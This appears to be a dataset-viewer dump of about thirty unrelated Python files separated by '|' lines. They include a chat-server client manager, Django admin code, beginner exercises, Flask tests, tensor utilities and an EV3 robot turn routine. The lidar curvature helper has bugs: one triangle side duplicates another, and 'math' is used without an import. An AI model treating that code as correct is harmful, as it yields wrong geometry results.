event_counts = aec[model][generax_radius]
D = float(event_counts["D"])
T = float(event_counts["T"])
S = float(event_counts["SL"]) + float(event_counts["S"])
L = float(event_counts["SL"])
norm = D + T + S + L
D /= norm
T /= norm
S /= norm
L /= norm
toprint += " S\t= " + str2(S) + "\n"
toprint += " D\t= " + str2(D) + "\n"
toprint += " L\t= " + str2(L) + "\n"
toprint += " D/S\t= " + str2(D/S) + "\n"
if (T != 0.0):
toprint += " T\t= " + str2(T) + "\n"
toprint += " T/S\t= " + str2(T/S) + "\n"
print(toprint)
def print_event_counts_datadir(datadir):
print_event_freqs(get_all_event_counts(datadir))
#print_event_counts_norm(get_all_event_counts(datadir))
def sum_event_counts(datadirs):
sum_aec = get_all_event_counts(datadirs[0])
for datadir in datadirs[1:]:
aec = get_all_event_counts(datadir)
if (aec == {}):
continue
assert(aec.keys() == sum_aec.keys())
for model in aec:
assert(aec[model].keys() == sum_aec[model].keys())
for generax_radius in aec[model]:
ec = aec[model][generax_radius]
sum_ec = sum_aec[model][generax_radius]
for event in sum_ec:
sum_ec[event] += ec[event]
print_event_freqs(sum_aec)
if (__name__ == "__main__"):
if (len(sys.argv) < 2):
print("Syntax python " + os.path.basename(__file__) + " datadirs")
sys.exit(1)
if (len(sys.argv) == 2):
datadir = sys.argv[1]
print_event_counts_datadir(datadir)
else:
datadirs = sys.argv[1:]
sum_event_counts(datadirs)
|
# coding: utf-8
# Standard Python libraries
from typing import Optional, Tuple
# iprPy imports
from .buildcombos_functions import loaded
__all__ = ['buildcombos']
def buildcombos(style: str,
database,
keys: list,
content_dict: Optional[dict] = None,
**kwargs) -> Tuple[dict, dict]:
"""
Wrapper function for the modular buildcombos styles
Parameters
----------
style : str
The buildcombos style to use
database : iprPy.database.Database
The database to use in building combos
keys : list
The calculation multikey set to build combos for
content_dict : dict, optional
Contains loaded file content. If not given, an empty
dict will be created
kwargs : any
Additional keyword arguments will be used to limit which records from
the database are used in building combos values.
Returns
-------
inputs : dict
Contains the values generated for each key
content_dict : dict
Contains loaded file content
"""
return loaded[style](database, keys, content_dict=content_dict, **kwargs)
|
from Client import Client
from Authorizer import Authorizer
from typing import Dict
import socket
import select
from Response import Response, SignOff
from RequestManager import RequestManager
import time
from threading import Timer
from UVMPMException import InvalidRequestSyntax
class ClientManager:
TIMEOUT = 120 # seconds
def __init__(self):
self.authorizer = Authorizer("auth_info.json")
self.request_manager = RequestManager()
self.sockets: Dict[int, socket.socket] = {} # fileno : sock
self.clients: Dict[int, Client] = {} # fileno : client
self.authorized_clients: Dict[str, Client] = {} # username : client
self.buffered_data: Dict[int, str] = {} # fileno : data
self.poller = select.poll()
self.remove_idle_clients_forever()
def client_exists(self, sock: socket.socket):
return sock.fileno() in self.clients
def create_client(self, sock: socket.socket):
if self.client_exists(sock):
return
client = Client(sock)
self.clients[sock.fileno()] = client
self.sockets[sock.fileno()] = sock
self.poller.register(sock, select.POLLIN)
print(str(client), "connected.")
def login_client(self, client: Client, username: str):
self.authorized_clients[username] = client
client.set_authorized(username)
print(str(client), "authorized.")
def remove_client(self, client: Client):
self.clients.pop(client.sock.fileno(), None)
if client.username:
self.authorized_clients.pop(client.username, None)
self.sockets.pop(client.sock.fileno(), None)
self.buffered_data.pop(client.sock.fileno(), None)
if client.sock.fileno() > -1:
self.poller.unregister(client.sock.fileno())
client.sock.close()
print(str(client), "disconnected.")
def broadcast(self, response: Response):
for client in self.authorized_clients.values():
client.send_response(response)
def remove_idle_clients_forever(self):
now = time.time()
for client in list(self.clients.values()):
if now - client.last_interaction_time > ClientManager.TIMEOUT:
self.remove_client(client)
self.broadcast(SignOff(client.username))
print("removing", str(client), "due to inactivity")
Timer(10, self.remove_idle_clients_forever).start()
def add_data(self, fileno, data):
if fileno not in self.buffered_data:
self.buffered_data[fileno] = ""
self.buffered_data[fileno] += data
def pop_buffered_requests(self, fileno: int):
raw_messages = self.buffered_data.get(fileno)
if not raw_messages:
return []
client = self.clients.get(fileno)
split = raw_messages.split("\n")
raw_messages = split[:-1]
requests = []
for raw_message in raw_messages:
try:
requests.append(self.request_manager.get_request(client, raw_message))
except InvalidRequestSyntax:
self.remove_client(client)
return []
self.buffered_data[fileno] = split[-1]
return requests
|
class Config:
def __init__(self, data = []):
self.instrument_list = data
def add_instrument(self, instrument):
self.instrument_list += {instrument}
def data(self):
return self.instrument_list
|
"""
2. Faça um Programa que peça um número e então mostre a mensagem O número informado foi [número].
"""
out = input("Entre com um numero: ")
print("Numero: ", out)
|
# Exercício 5.12 - Livro
dep = float(input('Informe o valor do depósito: '))
taxa = int(input('Taxa de juros: '))
invest = float(input('Valor mensal: '))
mes = 1
saldo = dep
while mes <= 24:
saldo += ((saldo * taxa) / 100) + invest
mes += 1
print(f'Total: {saldo - dep:.2f}')
|
class Board: # Used for places with more than one area onscreen, like the village
def __init__(self, canvasWidth, canvasHeight, imagePrefix, arrayWidth, arrayHeight, firstImage):
self.canvasWidth = canvasWidth
self.canvasHeight = canvasHeight
self.imagePrefix = imagePrefix
self.arrayWidth = arrayWidth
self.arrayHeight = arrayHeight
self.images = []
for i in range(arrayWidth*arrayHeight): # Finding all the images
self.images.append(loadImage(imagePrefix + "-" + str(i + 1) + ".png"))
self.currentImage = firstImage
self.action = ""
def run(self):
self.display()
# When the player moves offscreen to a different zone. I should probably make it pan, but this is the best I got (TODO)
if self.action == "l":
if self.currentImage%self.arrayWidth != 0:
self.currentImage -= 1
if self.action == "r":
if self.currentImage%self.arrayWidth - 1 == 0:
self.currentImage += 1
if self.action == "u":
if floor(self.currentImage/self.arrayWidth) != 0:
self.currentImage -= self.arrayWidth
if self.action == "d":
if floor(self.currentImage/self.arrayWidth) != self.arrayHeight - 1:
self.currentImage += self.arrayWidth
self.action = ""
def display(self):
#background(0, 100, 0)
image(self.images[self.currentImage], 0, 0, self.canvasWidth, self.canvasHeight)
|
#!/usr/bin/env python
# encoding: utf-8
from __future__ import unicode_literals
from django.contrib import admin
from .models import GroceryList, GroceryItem, \
GroceryAisle, GroceryShared, \
GroceryRecipe
from .serializers import GroceryItemSerializer
class GroceryListInline(admin.TabularInline):
model = GroceryItem
ser = GroceryItemSerializer
class GroceryListAdmin(admin.ModelAdmin):
#inlines = [GroceryListInline, ]
list_display = ['title', 'author']
list_filter = ['author']
search_fields = ['author__username', 'title']
ordering = ['author__username', 'title']
class GroceryItemAdmin(admin.ModelAdmin):
list_display = ['list', 'item', 'listAuthor']
list_filter = ['list', 'list__author']
ordering = ['list', 'item']
search_fields = ['list']
def listAuthor(self, obj):
return obj.list.author
listAuthor.short_description = 'Author'
class GroceryAisleAdmin(admin.ModelAdmin):
list_display = ['aisle', 'author']
ordering = ['aisle', 'author__username']
list_filter = ['author']
search_fields = ['author__username', 'aisle']
class GrocerySharedAdmin(admin.ModelAdmin):
list_display = ['list', 'shared_by']
list_filter = ['shared_by', 'shared_to']
search_fields = ['shared_by__username', 'shared_to__username']
exclude = ['shared_by']
ordering = ['list']
class GroceryRecipeAdmin(admin.ModelAdmin):
list_display = ['list', 'recipe', 'listAuthor']
list_filter = ['list', 'recipe', 'list__author']
def listAuthor(self, obj):
return obj.list.author
listAuthor.short_description = 'Author'
# TODO: Admin site is disabled for List since there are no web hooks yet
# admin.site.register(GroceryList, GroceryListAdmin)
# admin.site.register(GroceryShared, GrocerySharedAdmin)
# admin.site.register(GroceryItem, GroceryItemAdmin)
# admin.site.register(GroceryAisle, GroceryAisleAdmin)
# admin.site.register(GroceryRecipe, GroceryRecipeAdmin)
|
#!/usr/bin/env python3
import pathlib
from typing import Dict, List, Optional, Union
from copy import copy
try:
import ujson as json
except ModuleNotFoundError:
import json # type: ignore
JokeType = Dict[str, List[Dict[str, str]]]
JOKES: JokeType = {"default": []}
class JsonError(Exception):
pass
def load_jokes(
filename: Union[str, pathlib.Path], jokes: Optional[JokeType] = None
) -> JokeType:
fl = pathlib.Path(filename)
res_jokes: JokeType = copy(jokes) if jokes else copy(JOKES)
if fl.exists():
if fl.is_dir():
for file in fl.iterdir():
res_jokes = load_jokes(file, res_jokes)
else:
try:
data = json.load(open(fl))
except ValueError as e:
raise JsonError(f"malformed json ({e})")
if "jokes" not in data or type(data["jokes"]) is not list:
raise JsonError("`jokes` must be a list of joke objects")
category = data["category"] if "category" in data else "default"
author = data["author"] if "author" in data else None
for joke in data["jokes"]:
if "text" not in joke:
raise JsonError("no `text` in joke object")
if category not in res_jokes.keys():
res_jokes[category] = []
res_jokes[category].append(
{
"text": joke["text"],
"author": author if "author" not in joke else joke["author"],
}
)
return res_jokes
if __name__ == "__main__":
jokes = load_jokes("jokes")
print(jokes)
|
from collections import Counter
lb = 171309
ub = 643603
def possible_password(pw):
as_word=str(pw)
if all([as_word[i]!=as_word[i+1] for i in range(5)]):
return False
if any([int(as_word[i])>int(as_word[i+1]) for i in range(5)]):
return False
return True
password_range=[possible_password(pw) for pw in range(lb,ub)]
possible_passwords=[range(lb,ub)[row] for row in range(ub-lb) if password_range[row]==True]
num_possibles=sum(password_range)
print("Part 1: "+str(num_possibles))
smaller_range=[]
for pw in possible_passwords:
as_word=str(pw)
letter_counts=list(Counter(str(as_word)).values())
if any([ct==2 for ct in letter_counts]):
smaller_range.append(pw)
print("Part 2: "+str(len(smaller_range)))
|
"""Demo test suite for testing Flask."""
from server import app
from unittest import TestCase
from model import example_data, connect_to_db, db
from flask import session
class TestFlaskRoutes(TestCase):
"""Test Flask routes."""
def setUp(self):
"""Create a test client. """
self.client = app.test_client()
app.config['TESTING'] = True
def test_homepage(self):
"""Make sure home page returns correct HTML."""
# Use the test client to make requests
result = self.client.get('/')
# Compare result.data with assert method
self.assertIn(b'Type symbols or key words', result.data)
def test_search_stock_form(self):
"""Test that /stock route processes form data correctly."""
result = self.client.get('/stock', query_string={'word': 'lk'})
self.assertIn(b'Luckin Coffee Inc.', result.data)
class FlaskTestsDatabase(TestCase):
"""Flask tests that use the database."""
def setUp(self):
"""Stuff to do before every test."""
# Get the Flask test client
self.client = app.test_client()
app.config['TESTING'] = True
# Connect to test database
connect_to_db(app, "postgresql:///testdb")
# Create tables and add sample data
db.create_all()
example_data()
def test_screen_result(self):
"""Test screen result pages and database stocks table."""
result = self.client.get("/result", query_string={'left': 1, 'right': 20})
self.assertIn(b"HMI", result.data)
def test_watchlist_redirect(self):
"""Test watchlist page before user sign-in."""
result = self.client.get('/watchlist',
follow_redirects=True)
self.assertIn(b"Please sign in for Smart Investor Watchlist", result.data)
def tearDown(self):
"""Do at end of every test."""
db.session.remove()
db.drop_all()
db.engine.dispose()
class FlaskTestsLoggedIn(TestCase):
"""Flask tests with user logged into session."""
def setUp(self):
"""Set up session."""
app.config['TESTING'] = True
app.config['SECRET_KEY'] = 'key'
self.client = app.test_client()
with self.client as c:
with c.session_transaction() as sess:
sess['email'] = 'ydai7@mail.ccsf.edu'
connect_to_db(app, "postgresql:///testdb")
db.create_all()
example_data()
def test_show_watchlist(self):
"""Test watchlist page after user login-in."""
result = self.client.get("/watchlist")
self.assertIn(b"HMI", result.data)
def tearDown(self):
"""Do at end of every test."""
db.session.remove()
db.drop_all()
db.engine.dispose()
if __name__ == '__main__':
import unittest
unittest.main() |
import numpy as np
import matplotlib.pyplot as plt
datos=np.loadtxt("datos.txt")
x=datos[:,1]
y=datos[:,0]
plt.plot(x,y)
plt.xlabel("p2")
plt.ylabel("q2")
plt.savefig("caos.pdf")
|
# 格式化字符输出
# 定义字符串变量 name,输出 我的名字叫小明,请多多关照!
name = "xiaoming"
print("我的名字叫 %s,请多多关照!" % name) # %s 表示字符串
# 定义整数变量 student_no,输出 我的学号是000001
student_no = 100
print("我的学号是 %06d" % student_no) # %d 表示十进制整数 %06d 表示占位符
#
price = 8.5
weight = 7.5
money = price * weight
print("苹果的单价 %.2f 元/斤,购买了 %.3f 斤,需要支付 %.4f 元" % (price, weight, money)) # %f 浮点数
#
scale = 0.25
print("数据比例是 %.2f%%" % (scale * 100)) # %% 输出% |
# LEVEL 11
# http://www.pythonchallenge.com/pc/return/5808.html
from PIL import Image, ImageDraw
orig = Image.open('data/cave.jpg')
pix = orig.load()
w, h = orig.size
each_size = w // 2, h // 2
new1 = Image.new('RGB', each_size, 'black')
draw1 = ImageDraw.Draw(new1)
new2 = Image.new('RGB', each_size, 'black')
draw2 = ImageDraw.Draw(new2)
odd = True
for x in range(w):
for y in range(h):
px = pix[x, y]
new_coords = (x // 2, y // 2)
if odd:
draw1.point(new_coords, px)
else:
draw2.point(new_coords, px)
odd = not odd
new1.save('data/cave1.jpg')
new2.save('data/cave2.jpg')
|
class AStar(object):
# MARK: Constructor for a state object.
def __init__(self, game):
# A game object.
self.game = game
self.root = game.initial
self.goal = game.goal
self.forbidden = game.forbidden
self.expanded = game.expanded
self.fringe = []
# MARK: Return true if the node had not been expanded.
def is_added(self, node):
for state in self.fringe:
if node.is_identical_state(state):
return True
return False
# MARK: Add the node to fringe and sorted by heuristic.
def add_to_fringe(self, node):
if len(self.fringe) == 0:
node.evaluation_function = node.heuristic + node.path_cost
self.fringe.append(node)
return
for index in range(len(self.fringe)):
node.evaluation_function = node.heuristic + node.path_cost
if node.evaluation_function <= self.fringe[index].evaluation_function:
self.fringe.insert(index, node)
break
elif index == len(self.fringe) - 1:
self.fringe.append(node)
break
nodes = []
for entry in self.fringe:
nodes.append(entry.state)
return
# MARK: Pop the first element in the queue.
def pop_from_fringe(self):
return self.fringe.pop(0)
def search(self):
# Calling recursive method.
target_node = self.search_recursive(self.root)
if target_node is None:
return "No solution found.\n{0}".format(self.game.expanded_in_string())
else:
return "{0}\n{1}".format(target_node.path, self.game.expanded_in_string())
# Return a node if found, or return None if not found.
def search_recursive(self, node):
# Expand the node first.
generated_states = self.game.expand_state(node)
# Adding them into priority queue once.
for state in generated_states:
self.add_to_fringe(state)
# Stopping Condition.
if node.state == self.goal:
return node
if len(self.expanded) >= 1000:
return None
# Continue Recursive.
for child in self.fringe:
target_node = self.search_recursive(self.pop_from_fringe())
if target_node is not None:
return target_node
if len(self.expanded) >= 1000:
return None
return None |
from django.urls import path
from . import views
urlpatterns = [
path('registration/',
views.Registration.as_view(),
name='registration'),
]
|
import traceback
from . import uff_pb2 as uff_pb
from .data import create_data, convert_to_debug_data
class Node(object):
def __init__(self, graph, op, name, inputs=None, fields=None, extra_fields=None):
self.graph = graph
self.inputs = inputs if inputs else []
self.fields = fields if fields else {}
self.extra_fields = extra_fields if extra_fields else {}
self.name = name
self.op = op
self._trace = traceback.format_stack()[:-1]
def _convert_fields(self, fields, debug):
descriptor = self.graph.meta_graph.descriptor
ret_fields = {}
for k, v in fields.items():
if v is None:
continue
if not isinstance(v, uff_pb.Data):
if self.op in descriptor:
field_type = descriptor[self.op].get_field_type(k)
ret_fields[k] = create_data(v, field_type)
else:
ret_fields[k] = create_data(v)
else:
ret_fields[k] = v
if debug:
ret_fields[k] = convert_to_debug_data(ret_fields[k])
return ret_fields
def to_uff(self, debug=False):
return uff_pb.Node(id=self.name,
inputs=[i.name if isinstance(i, Node) else i for i in self.inputs],
operation=self.op,
fields=self._convert_fields(self.fields, debug),
extra_fields=self._convert_fields(self.extra_fields, debug))
|
from typing import List, Optional, Tuple, Union
import torch
from torch import nn, Tensor
def _cat(tensors: List[Tensor], dim: int = 0) -> Tensor:
"""
Efficient version of torch.cat that avoids a copy if there is only a single element in a list
"""
# TODO add back the assert
# assert isinstance(tensors, (list, tuple))
if len(tensors) == 1:
return tensors[0]
return torch.cat(tensors, dim)
def convert_boxes_to_roi_format(boxes: List[Tensor]) -> Tensor:
concat_boxes = _cat([b for b in boxes], dim=0)
temp = []
for i, b in enumerate(boxes):
temp.append(torch.full_like(b[:, :1], i))
ids = _cat(temp, dim=0)
rois = torch.cat([ids, concat_boxes], dim=1)
return rois
def check_roi_boxes_shape(boxes: Union[Tensor, List[Tensor]]):
if isinstance(boxes, (list, tuple)):
for _tensor in boxes:
torch._assert(
_tensor.size(1) == 4, "The shape of the tensor in the boxes list is not correct as List[Tensor[L, 4]]"
)
elif isinstance(boxes, torch.Tensor):
torch._assert(boxes.size(1) == 5, "The boxes tensor shape is not correct as Tensor[K, 5]")
else:
torch._assert(False, "boxes is expected to be a Tensor[L, 5] or a List[Tensor[K, 4]]")
return
def split_normalization_params(
model: nn.Module, norm_classes: Optional[List[type]] = None
) -> Tuple[List[Tensor], List[Tensor]]:
# Adapted from https://github.com/facebookresearch/ClassyVision/blob/659d7f78/classy_vision/generic/util.py#L501
if not norm_classes:
norm_classes = [
nn.modules.batchnorm._BatchNorm,
nn.LayerNorm,
nn.GroupNorm,
nn.modules.instancenorm._InstanceNorm,
nn.LocalResponseNorm,
]
for t in norm_classes:
if not issubclass(t, nn.Module):
raise ValueError(f"Class {t} is not a subclass of nn.Module.")
classes = tuple(norm_classes)
norm_params = []
other_params = []
for module in model.modules():
if next(module.children(), None):
other_params.extend(p for p in module.parameters(recurse=False) if p.requires_grad)
elif isinstance(module, classes):
norm_params.extend(p for p in module.parameters() if p.requires_grad)
else:
other_params.extend(p for p in module.parameters() if p.requires_grad)
return norm_params, other_params
def _upcast(t: Tensor) -> Tensor:
# Protects from numerical overflows in multiplications by upcasting to the equivalent higher type
if t.is_floating_point():
return t if t.dtype in (torch.float32, torch.float64) else t.float()
else:
return t if t.dtype in (torch.int32, torch.int64) else t.int()
def _upcast_non_float(t: Tensor) -> Tensor:
# Protects from numerical overflows in multiplications by upcasting to the equivalent higher type
if t.dtype not in (torch.float32, torch.float64):
return t.float()
return t
def _loss_inter_union(
boxes1: torch.Tensor,
boxes2: torch.Tensor,
) -> Tuple[torch.Tensor, torch.Tensor]:
x1, y1, x2, y2 = boxes1.unbind(dim=-1)
x1g, y1g, x2g, y2g = boxes2.unbind(dim=-1)
# Intersection keypoints
xkis1 = torch.max(x1, x1g)
ykis1 = torch.max(y1, y1g)
xkis2 = torch.min(x2, x2g)
ykis2 = torch.min(y2, y2g)
intsctk = torch.zeros_like(x1)
mask = (ykis2 > ykis1) & (xkis2 > xkis1)
intsctk[mask] = (xkis2[mask] - xkis1[mask]) * (ykis2[mask] - ykis1[mask])
unionk = (x2 - x1) * (y2 - y1) + (x2g - x1g) * (y2g - y1g) - intsctk
return intsctk, unionk
|
# Generated by Django 2.2.4 on 2019-12-02 04:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('visitors', '0016_track_entry_security'),
]
operations = [
migrations.AlterField(
model_name='track_entry',
name='with_vehicle',
field=models.BooleanField(default=True),
),
]
|
from playsound import playsound
def kick():
playsound("kick.mp3", 0)
def snare():
playsound("snare.wav", 0)
def hihat():
playsound("hihat.wav", 0) |
# Helper class for prescribed parameters (i.e.
# radial profiles given at t=0)
import numpy as np
from . EquationException import EquationException
class PrescribedScalarParameter:
def _setScalarData(self, data, times=0):
"""
Set prescribed scalar data appropriately.
"""
if np.isscalar(times):
t = np.asarray([times])
else: t = np.asarray(times)
if np.isscalar(data):
d = data*np.ones((t.size, ))
else: d = np.asarray(data)
return d, t
def _verifySettingsPrescribedScalarData(self, name, data, times):
"""
Verify the structure of the prescribed data.
"""
if len(data.shape) != 1:
raise EquationException("{}: Invalid number of dimensions in prescribed scalar data. Expected one dimension (times).".format(name))
elif len(times.shape) != 1:
raise EquationException("{}: Invalid number of dimensions in radial grid of prescribed scalar data. Expected one dimension.".format(name))
elif data.shape[0] != times.size:
raise EquationException("{}: Invalid size of prescribed data: {}. Expected {} elements."
.format(name, data.shape[0], times.size))
|
#!/usr/bin/env python
"""
Copyright (c) 2020, SunSpec Alliance
All Rights Reserved
"""
from distutils.core import setup
setup(
name='pysunspec2',
version='1.0.3',
description='Python SunSpec Tools',
author='SunSpec Alliance',
author_email='support@sunspec.org',
url='https://sunspec.org/',
packages=['sunspec2', 'sunspec2.modbus', 'sunspec2.file', 'sunspec2.tests'],
package_data={'sunspec2.tests': ['test_data/*'], 'sunspec2': ['models/json/*']},
python_requires='>=3.5',
extras_require={
'serial': ['pyserial'],
'excel': ['openpyxl'],
'test': ['pytest'],
},
)
|
import os
from wsdm.ts.helpers.persons import persons
from definitions import NOMENCLATURES_DIR
from definitions import PERSONS_DIR
if __name__ == '__main__':
with open(os.path.join(NOMENCLATURES_DIR, "persons.txt"), encoding='utf8', mode='r') as fr:
with open(os.path.join(NOMENCLATURES_DIR, "missing_persons.txt"), encoding='utf8', mode='w') as fw:
for line in fr:
person_name = line.split(' ', 1)[0]
modified_name = persons.remove_spaces(person_name)
file_name = os.path.join(PERSONS_DIR, modified_name + '.txt')
if not os.path.isfile(file_name):
fw.write(line)
|
import os
import docker
from docker.errors import BuildError
from patchworkdocker.errors import PatchworkDockerError
class DockerBuildError(PatchworkDockerError):
"""
Docker build error.
"""
def build_docker_image(image_name: str, context: str, dockerfile: str):
"""
Builds a Docker image with the given tag from the given Dockerfile in the given context.
:param image_name: image tag (can optionally include a version tag)
:param context: context to build the image in (absolute file path)
:param dockerfile: Dockerfile to build the image from (absolute file path)
:raises BuildFailedError: raised if an error occurs during the build
"""
if not os.path.isabs(context):
raise ValueError(f"Context location must be absolute: {context}")
if not os.path.isabs(dockerfile):
raise ValueError(f"Dockerfile location must be absolute: {dockerfile}")
client = docker.from_env()
try:
client.images.build(path=context, dockerfile=dockerfile, tag=image_name)
except BuildError as e:
raise DockerBuildError(f"Error building image: {image_name}") from e
|
import imdb
class Movie(object):
def __init__(self, name, year):
self.name = name
self.year = year
def __str__(self):
return '%s (%s)' % (self.name, self.year)
@staticmethod
def create_movie_from_query(query):
db = imdb.IMDb()
movie_obj = db.search_movie(query, results=1)[0]
created_movie = Movie(name=movie_obj['title'], year=movie_obj['year'])
return created_movie |
import numpy as np
from math import sqrt, pi
import random
######################### Define Function ########################
def get_angle(input_list):
angle = math.atan2(input_list[1], input_list[0])
if input_list[1]<0:
angle = angle+2*pi
return angle*180/pi
def sortline_angle(line):
length = len(line[:][:, 0])
tmp_x = sum(line[:][:, 0])/length
tmp_y = sum(line[:][:, 1]) / length
inner_point = [tmp_x, tmp_y]
linedict = {}
linevectors = line - inner_point
listangle = list(map(get_angle, linevectors))
for i in range(0, length):
# line1dict[xline1[i]] = [xline1[i],yline1[i]]
linedict[listangle[i]] = line[:][i, :]
linedict_sorted = sorted(linedict.items())
listangle = sorted(listangle)
line_sorted = np.empty([0, 2])
length = len(linedict_sorted)
for j in range(0, length):
line_sorted = np.append(line_sorted, [linedict_sorted[j][1]], axis=0)
for i in range(0, length - 1):
theta = abs(listangle[i] - listangle[i + 1])
if 180 < theta:
move = line_sorted[:i + 1]
line_sorted = line_sorted[i + 1:]
line_sorted = np.append(line_sorted, move, axis=0)
return line_sorted
########################################################################
############################ Main Function #############################
########################################################################
def calcurvature(lidar):
x = lidar[0]
y = lidar[1]
curvedict = {}
length = len(x)
for i in range(0, length):
curvedict[x[i]] = [x[i], y[i]]
curve_sorted = sorted(curvedict.items())
iternum = 4
r_list = np.empty((1, 3))
for i in range(iternum):
idx = random.randint(0, length//3)
p1 = curve_sorted[idx]
p2 = curve_sorted[idx+(length-2*idx)//2]
p3 = curve_sorted[idx + (length - 2 * idx)]
a = sqrt((p2[0]-p1[0])**2+(p2[1]-p1[1])**2)
b = sqrt((p3[0] - p2[0]) ** 2 + (p3[1] - p2[1])** 2)
c = sqrt((p3[0] - p2[0]) ** 2 + (p3[1] - p2[1])** 2)
q = (a**2+b**2-c**2)/(2*a*b)
r = c/(2*sqrt(1-q**2))
r_list = np.append(r_list, r)
r_avg = sum(r_list)/len(r_list)
return r_avg
|
# -*- coding: ms949 -*-
import pandas as pd
import matplotlib.pylab as plt
from sklearn.tree.tree import DecisionTreeRegressor
""" Show data by graph """
ram_prices = pd.read_csv("ram_price.csv")
plt.semilogy(ram_prices.date, ram_prices.price) # logScale로 바꿔줌
plt.xlabel("year")
plt.ylabel("prices ($/Mbyte")
plt.show()
""" Prediction of RAM prices """
from sklearn.tree import DecisionTreeRegressor
from sklearn.linear_model import LinearRegression
import numpy as np
data_train = ram_prices[ram_prices.date < 2000]
data_test = ram_prices[ram_prices.date >= 2000]
# 가격 예측을 위해 날짜 특성만을 이용
X_train = data_train.date[:, np.newaxis] # 1차원을 2차원으로 만들어줌(rank를 맞춤)
# 데이터와 타깃의 관계를 간단하게 만들기 위해 로그 스케일로 바꿈
y_train = np.log(data_train.price)
tree = DecisionTreeRegressor().fit(X_train, y_train)
linear_reg = LinearRegression().fit(X_train, y_train)
# 예측은 전체 기간에 대해서 수행
X_all = ram_prices.date[:, np.newaxis]
pred_tree = tree.predict(X_all)
pred_lr = linear_reg.predict(X_all)
# 에측한 값의 로그 스케일을 되돌림
price_tree = np.exp(pred_tree)
price_lr = np.exp(pred_lr)
plt.semilogy(data_train.date, data_train.price, label="train data")
plt.semilogy(data_train.date, data_train.price, label="test data")
plt.semilogy(ram_prices.date, price_tree, label="Tree prediction")
plt.semilogy(ram_prices.date, price_lr, label="Linear regression")
plt.legend()
plt.show() |
#!/usr/bin/env python3
from ev3dev2.motor import MoveTank, OUTPUT_B, OUTPUT_C
from ev3dev2.sensor import INPUT_1, INPUT_2, INPUT_3, INPUT_4
from ev3dev2.sensor.lego import ColorSensor, GyroSensor, UltrasonicSensor
from sys import stderr
gyro = GyroSensor(INPUT_1)
tank_block = MoveTank(OUTPUT_B, OUTPUT_C)
#_________________________________________________________________________________________________________________________________
def Turn_from_start_position(stop, speed, degrees):
print("In Turn_from_start_position", file=stderr)
current_gyro_reading = gyro.angle
print("Current Gyro: {}".format (float(current_gyro_reading)), file=stderr)
# if the gyro is smaller than degrees (parameter from above)
if current_gyro_reading < degrees:
tank_block.on(left_speed = -speed, right_speed = speed) #turn the robot
while current_gyro_reading < degrees:
#print("Current Gyro: {}".format (float(current_gyro_reading)), file=stderr)
# read in the gyro value
current_gyro_reading = gyro.angle
#gyro reading is larger than target (once reached the degrees) stop program
if current_gyro_reading >= degrees:
break
if stop():
break
# if the gyro is larger than degrees (parameter from above)
elif current_gyro_reading > degrees:
tank_block.on(left_speed = speed, right_speed = -speed)#turn the robot
while current_gyro_reading > degrees:
#print("Current Gyro: {}".format (float(current_gyro_reading)), file=stderr)
current_gyro_reading = gyro.angle
#gyro reading is smaller than target (once reached the degrees) stop program
if current_gyro_reading <= degrees:
break
if stop():
break
tank_block.off()
print("Leaving Turn_from_start_position", file=stderr)
print("Current Gyro: {}".format (float(current_gyro_reading)), file=stderr)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.